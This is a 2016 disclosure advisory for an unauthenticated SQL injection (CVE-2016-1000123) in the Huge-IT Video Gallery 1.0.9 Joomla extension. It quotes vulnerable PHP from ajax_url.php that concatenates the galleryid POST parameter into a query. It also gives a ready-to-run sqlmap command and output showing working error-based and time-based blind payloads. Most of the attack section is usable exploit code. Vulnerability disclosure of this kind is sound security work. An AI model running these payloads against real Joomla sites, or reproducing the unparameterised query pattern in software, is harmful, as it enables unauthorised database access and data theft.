Joomla Huge-IT Video Gallery 1.0.9 SQL Injection

`  
Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla  
Author: Larry W. Cashdollar, @_larry0  
Date: 2016-09-15  
Download Site: http://huge-it.com/joomla-video-gallery/  
Vendor: www.huge-it.com, fixed v1.1.0  
Vendor Notified: 2016-09-17  
Vendor Contact: [email protected]  
Description: A video slideshow gallery.  
Vulnerability:  
The following code does not prevent an unauthenticated user from injecting SQL into functions located in ajax_url.php.   
  
Vulnerable Code in : ajax_url.php  
  
11 define('_JEXEC',1);  
12 defined('_JEXEC') or die('Restircted access');  
.  
.  
.  
28 if($_POST['task']=="load_videos_content"){  
29   
30 $page = 1;  
31   
32   
33 if(!empty($_POST["page"]) && is_numeric($_POST['page']) && $_POST['page']>0){  
34 $paramssld='';  
35 $db5 = JFactory::getDBO();  
36 $query5 = $db->getQuery(true);  
37 $query5->select('*');  
38 $query5->from('#__huge_it_videogallery_params');  
39 $db->setQuery($query5);  
40 $options_params = $db5->loadObjectList();  
41 foreach ($options_params as $rowpar) {  
42 $key = $rowpar->name;  
43 $value = $rowpar->value;  
44 $paramssld[$key] = $value;  
45 }  
46 $page = $_POST["page"];  
47 $num=$_POST['perpage'];  
48 $start = $page * $num - $num;  
49 $idofgallery=$_POST['galleryid'];  
50   
51 $query = $db->getQuery(true);  
52 $query->select('*');  
53 $query->from('#__huge_it_videogallery_videos');  
54 $query->where('videogallery_id ='.$idofgallery);  
55 $query ->order('#__huge_it_videogallery_videos.ordering asc');  
56 $db->setQuery($query,$start,$num);  
  
CVE-2016-1000123  
Exploit Code:  
aC/ $ sqlmap -u 'http://example.com/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2" --level=5 --risk=3  
aC/ .  
aC/ .  
aC/ .  
aC/ (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]   
aC/ sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:  
aC/ ---  
aC/ Parameter: #1* ((custom) POST)  
aC/ Type: error-based  
aC/ Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)  
aC/ Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2  
aC/   
aC/ Type: AND/OR time-based blind  
aC/ Title: MySQL >= 5.0.12 time-based blind - Parameter replace  
aC/ Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2  
aC/ ---  
aC/ [19:36:55] [INFO] the back-end DBMS is MySQL  
aC/ web server operating system: Linux Debian 8.0 (jessie)  
aC/ web application technology: Apache 2.4.10  
aC/ back-end DBMS: MySQL >= 5.0.12  
aC/ [19:36:55] [WARNING] HTTP error codes detected during run:  
aC/ 500 (Internal Server Error) - 2714 times  
aC/ [19:36:55] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'  
aC/   
aC/ [*] shutting down at 19:36:55  
Advisory: http://www.vapidlabs.com/advisory.php?v=169  
`